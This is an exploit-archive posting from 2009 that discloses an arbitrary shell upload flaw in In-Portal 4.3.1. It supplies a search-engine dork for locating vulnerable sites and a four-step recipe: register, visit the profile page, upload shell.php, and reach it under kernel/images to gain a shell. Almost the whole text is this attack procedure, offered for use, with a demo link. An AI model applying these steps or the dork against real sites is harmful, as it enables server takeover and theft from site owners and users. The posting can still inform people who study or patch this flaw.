[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability
# Published : 2009-07-28
# Author : Mr.tro0oqy
# Previous Title : PunBB Reputation.php Mod <= 2.0.4 Blind SQL Injection Exploit
# Next Title : PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability
[+] D0rk : Powered by In-portal ?? 1997-2009,
[+] Script site : www.in-portal.net
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site
http://www.xxx.com/path/platform/login/register.html
step2: go to your profile
http://www.xxx.com/path/platform/my_account/my_profile.html
step3: upload shell.php
step4: get shell
http://www.xxx.com/path/kernel/images/shell.php
Demo:
-----
http://www.in-portal.net/demo
-----
Yemeni ana ;)
# www.Syue.com [2009-07-28]